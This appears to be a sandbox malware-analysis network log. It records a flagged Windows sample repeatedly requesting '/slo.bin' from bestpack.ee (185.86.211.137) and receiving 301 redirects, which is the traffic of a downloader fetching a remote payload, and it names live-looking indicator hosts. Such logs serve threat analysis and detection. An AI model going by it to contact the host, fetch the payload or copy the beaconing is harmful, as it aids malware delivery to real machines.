                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 5 | Source IP: 192.168.11.20 | Source Port: 49770 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 18:59:44.487292051 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 18:59:44.705246925 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:44 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 6 | Source IP: 192.168.11.20 | Source Port: 49772 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 18:59:55.875292063 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 18:59:56.094286919 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:55 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 7 | Source IP: 192.168.11.20 | Source Port: 49774 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:00:07.278505087 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 19:00:07.496660948 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 8 | Source IP: 192.168.11.20 | Source Port: 49776 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:00:18.698251963 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 19:00:18.915961981 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:18 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 9 | Source IP: 192.168.11.20 | Source Port: 49778 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:00:30.120770931 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 19:00:30.342278957 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:30 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 10 | Source IP: 192.168.11.20 | Source Port: 49780 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:00:41.539582968 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
Sep 27, 2024 19:00:41.760488033 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:41 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 11 | Source IP: 192.168.11.20 | Source Port: 49782 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:00:52.924864054 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:00:53.142752886 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:00:53 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 12 | Source IP: 192.168.11.20 | Source Port: 49784 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:01:04.328171015 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:01:04.545500040 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:01:04 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 13 | Source IP: 192.168.11.20 | Source Port: 49786 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:01:15.705539942 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:01:15.928312063 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:01:15 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 14 | Source IP: 192.168.11.20 | Source Port: 49788 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:01:27.125247002 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:01:27.348969936 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:01:27 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 15 | Source IP: 192.168.11.20 | Source Port: 49790 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:01:38.508802891 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:01:38.729651928 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:01:38 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 16 | Source IP: 192.168.11.20 | Source Port: 49792 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:01:49.900963068 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:01:50.123106956 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:01:50 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 17 | Source IP: 192.168.11.20 | Source Port: 49794 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:02:01.238559008 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:02:01.456110001 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:02:01 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 18 | Source IP: 192.168.11.20 | Source Port: 49796 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:02:12.563296080 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:02:12.780922890 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:02:12 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID: 19 | Source IP: 192.168.11.20 | Source Port: 49798 | Destination IP: 185.86.211.137 | Destination Port: 80 | PID: 6976 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

Timestamp: Sep 27, 2024 19:02:23.909811020 CEST | Bytes transferred: 163 | Direction: OUT | Data:
GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache

Timestamp: Sep 27, 2024 19:02:24.132325888 CEST | Bytes transferred: 427 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 17:02:24 GMT
Server: Apache
Location: https://bestpack.ee/slo.bin
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49800 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:02:35.251364946 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:02:35.473625898 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:35 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49802 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:02:46.588013887 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:02:46.806739092 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:46 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49804 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:02:57.990752935 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:02:58.208281994 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:58 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49806 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:03:09.383183002 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:03:09.605453014 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:09 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49808 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:03:20.785826921 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:03:21.004549026 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:20 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49810 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:03:32.174453020 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:03:32.395390034 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:32 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49812 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:03:43.559664011 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:03:43.781584978 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:43 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49814 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:03:54.960576057 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:03:55.177107096 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:55 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49816 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:04:06.319405079 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:04:06.538369894 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:06 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49818 | 185.86.211.137 | 80 | 6976 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 19:04:17.684366941 CEST | 163 | OUT | GET /slo.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: bestpack.ee
Cache-Control: no-cache
Sep 27, 2024 19:04:17.913446903 CEST | 427 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


